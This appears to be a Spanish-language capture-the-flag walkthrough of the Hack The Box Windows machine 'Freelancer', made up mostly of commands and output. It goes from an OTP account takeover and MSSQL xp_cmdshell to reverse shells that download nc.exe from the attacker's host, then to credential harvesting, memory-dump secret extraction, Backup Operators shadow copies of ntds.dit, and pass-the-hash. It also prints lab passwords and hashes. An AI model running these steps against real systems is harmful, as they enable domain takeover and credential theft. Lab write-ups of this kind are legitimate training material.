Freelancer
OS: Windows
Dificultad: Difícil
Puntos: 40
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.129.64.53 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV -oN nmap.txt 10.129.64.53
Nmap scan report for 10.129.64.53
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-02 06:54:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
64416/tcp open msrpc Microsoft Windows RPC
64420/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeration
Primero crearemos un usuario como employer.
Si intentamos acceder no podremos pero es posible restablecer el password para acceder.
Ahora podemos autenticarnos como employer y hay un apartado interesante llamado QR-Code.
Enum users
Investigando un poco podemos enumerar usuarios.
GET /accounts/profile/visit/2/ HTTP/1.1
Host: freelancer.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://freelancer.htb/blog/details/?article_id=12
Connection: keep-alive
Cookie: csrftoken=FbxM5FKMdMudJohQpDrOidxNglAqNQA3; sessionid=hdp9xfqeo26c907yf6jbaktqbktpkqh1
Upgrade-Insecure-Requests: 1
Vemos que el usuario admin tiene el ID 2.
http://freelancer.htb/accounts/profile/visit/2/
QR code
Si escaneamos el QR obtendremos una URL que podemos usar para autenticarnos sin un password.
http://freelancer.htb/accounts/login/otp/MTAwMTI=/a89aef23f0b7a95b8d37a2fe580e3f82/
Esta parte de la URL MTAwMTI= esta en base64, haciendo el decode es nuestro numero de usuario 10012.
Admin access
Copiaremos el codigo OTP del QR y modificaremos la URL para acceder a la cuenta de admin. Haremos log out de nuestro usuario actual y accedermos a la siguiente URL.
http://freelancer.htb/accounts/login/otp/Mg==/191c10c32ed0b19bc84a85b8056fc8d9/
Ahora estamos dentro de la cuenta de admin.
Podemos acceder al siguiente portal.
http://freelancer.htb/admin/
MSSQL Impersonate
Podemos impersonar al usuario sa para ejecutar comandos. Verificamos que es posible con el siguiente query.
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
sa
Habilitamos xp_cmdshell para ejecutar comandos del sistema.
EXECUTE AS LOGIN = 'sa'
EXEC sp_configure 'show advanced options','1';
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell','1';
RECONFIGURE;
EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell "net user"
Reverse Shell
Ejecutamos el siguiente query para obtener una reverse shell.
EXECUTE AS LOGIN = 'sa'
EXEC xp_cmdshell "mkdir c:\temp"
EXEC xp_cmdshell "curl 10.10.14.18/nc64.exe -o c:\temp\nc.exe"
EXEC xp_cmdshell "c:\temp\nc.exe 10.10.14.18 1234 -e cmd.exe"
Lateral Movement
Investigando los archivos para encontrar passwords.
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\Resources\1033\sqlcm.xml
Program Files (x86)\Microsoft SQL Server\150\Tools\PowerShell\Modules\SQLPS\en\Microsoft.SqlServer.Management.PSSnapins.dll-Help.xml
Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
Windows\Panther\MigLog.xml
Windows\System32\DriverStore\FileRepository\prnms012.inf_amd64_acb6d904135c6a14\Amd64\MSIPP.xml
Dentro del siguiente archivo encontramos un par de passwords.
type Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
Las siguintes credenciales funcionan para conectarnos.
┌──(root㉿kali)-[~/htb/Box/Freelancer]
└─# crackmapexec smb 10.129.216.84 -u 'mikasaAckerman' -p 'IL0v3ErenY3ager'
SMB 10.129.216.84 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB 10.129.216.84 445 DC [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
Obtenemos reverse shell con la tool RunasCs.exe.
https://github.com/antonioCoco/RunasCs
RunasCs.exe mikasaAckerman IL0v3ErenY3ager "C:\temp\nc.exe 10.10.14.18 6666 -e cmd.exe" -t 0
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-539d8$\Default
[+] Async process 'C:\temp\nc.exe 10.10.14.18 6666 -e cmd.exe' with pid 4396 created in background.
┌──(root㉿kali)-[~/htb/Box/Freelancer]
└─# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.14.18] from (UNKNOWN) [10.129.216.84] 59496
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
freelancer\mikasaackerman
Privilege Escalation
Dentro del directorio c:\Users\mikasaAckerman\Desktop encontramos 2 archivos.
c:\Users\mikasaAckerman\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8954-28AE
Directory of c:\Users\mikasaAckerman\Desktop
05/28/2024 10:22 AM <DIR> .
05/28/2024 10:22 AM <DIR> ..
10/28/2023 06:23 PM 1,468 mail.txt
10/04/2023 01:47 PM 292,692,678 MEMORY.7z
06/02/2024 12:09 PM 34 user.txt
Nos descargamos el archivo.
nc -lvnp 7777 > MEMORY.7z
c:\temp\nc.exe -w 700 10.10.14.18 7777 < MEMORY.7z
Analyzing DMP File
Utilizaremos la siguiente tool para montar el MEMORY.DMP en su version windows.
https://github.com/ufrisk/MemProcFS
MemProcFS.exe -device MEMORY.DMP -forensic 0
Una vez montado, buscamos los archivos SYSTEM, SAM, SECURITY.
M:\registry\hive_files
Ahora que tenemos los archivos utilizando impacket para extraer la informacion.
impacket-secretsdump -system 0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive -sam 0xffffd3067d935000-SAM-MACHINE_SAM.reghive -security 0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive LOCAL
[*] _SC_MSSQL$DATA
(Unknown User):PWN3D#l0rr@Armessa199
[*] Cleaning up...
El password que obtivimos nos sirve con el usuario lorra199.
crackmapexec smb 10.129.185.251 -u users.txt -p 'PWN3D#l0rr@Armessa199' --continue
SMB 10.129.185.251 445 DC [+] freelancer.htb\lorra199:PWN3D#l0rr@Armessa199
BloodHound Enum
Utilizando bloodhound podemos enumerar los objetos del AD.
python3 /opt/BloodHound.py/bloodhound.py -u 'mikasaAckerman' -p 'IL0v3ErenY3ager' -d freelancer.htb -c all -ns 10.129.216.84
INFO: Found AD domain: freelancer.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.freelancer.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.freelancer.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 8 computers
INFO: Connecting to LDAP server: dc.freelancer.htb
INFO: Found 30 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SetupMachine.freelancer.htb
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: Datacenter-2019
INFO: Querying computer: DC.freelancer.htb
WARNING: Could not resolve: Datacenter-2019: The resolution lifetime expired after 3.115 seconds: Server Do53:10.129.216.84@53 answered The DNS operation timed out.
INFO: Done in 00M 32S
El usuario lorra199 tiene el privilegio Generic Write en el grup AD Recycle Bin.
Obtenemos una reverse shell.
RunasCs.exe lorra199 'PWN3D#l0rr@Armessa199' "C:\temp\nc.exe 10.10.14.47 7777 -e cmd.exe" -t 0
┌──(root㉿kali)-[/opt/windows]
└─# nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.47] from (UNKNOWN) [10.129.185.251] 60453
Microsoft Windows [Version 10.0.17763.5830]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
freelancer\lorra199
Utilizando el siguiente comando podemos saber que objetos estan eliminados y podemos recuperar.
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
Vemos el usuario liza.kazanof que pertenece al grupo Remote Management Users y Backup Operators. Podemos reestablecer el usuario de la siguiente forma.
Restore-ADObject -Identity "ebe15df5-e265-45ec-b7fc-359877217138" -NewName "lkazanof_tmp"
Comprobamos que el usuario se restablecio.
crackmapexec winrm 10.129.185.251 -u liza.kazanof -p 'RockYou!'
SMB 10.129.185.251 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:freelancer.htb)
HTTP 10.129.185.251 5985 DC [*] http://10.129.185.251:5985/wsman
WINRM 10.129.185.251 5985 DC [+] freelancer.htb\liza.kazanof:RockYou! (Pwn3d!)
El password de liza se obtuvo con el siguiente recurso winDBG y mimikatz https://diverto.hr/en/blog/en-2019-11-05-Extracting-Passwords-from-hiberfil-and-memdumps/
Backup Operators
Este usuario pertence al grupo Backup Operators por lo tanto lo podemos usar para escalar privs.
evil-winrm -i 10.129.185.251 -u liza.kazanof -p 'RockYou!'
*Evil-WinRM* PS C:\Users\liza.kazanof\Documents> net user liza.kazanof
User name liza.kazanof
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/14/2024 6:37:29 PM
Password expires 6/25/2024 6:37:29 PM
Password changeable 5/15/2024 6:37:29 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Generamos una copia del disco duro de la siguiente forma.
echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
diskshadow.exe /s c:\temp\diskshadow.txt
Copiamos los archivos necesarios.
robocopy /b Z:\Windows\System32\Config C:\temp SAM
robocopy /b Z:\Windows\System32\Config C:\temp SYSTEM
robocopy /b Z:\Windows\NTDS C:\temp ntds.dit
Los descargamos.
download ntds.dit
dowload SAM
dowmload SYSTEM
Ahora hacemos dump de los archivos.
impacket-secretsdump -system SYSTEM -sam SAM -ntds ntds.dit LOCAL
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::
Con esto podemos hacer passthehash y conseguir admin.
evil-winrm -i 10.129.185.251 -u Administrator -H 0039318f1e8274633445bce32ad1a290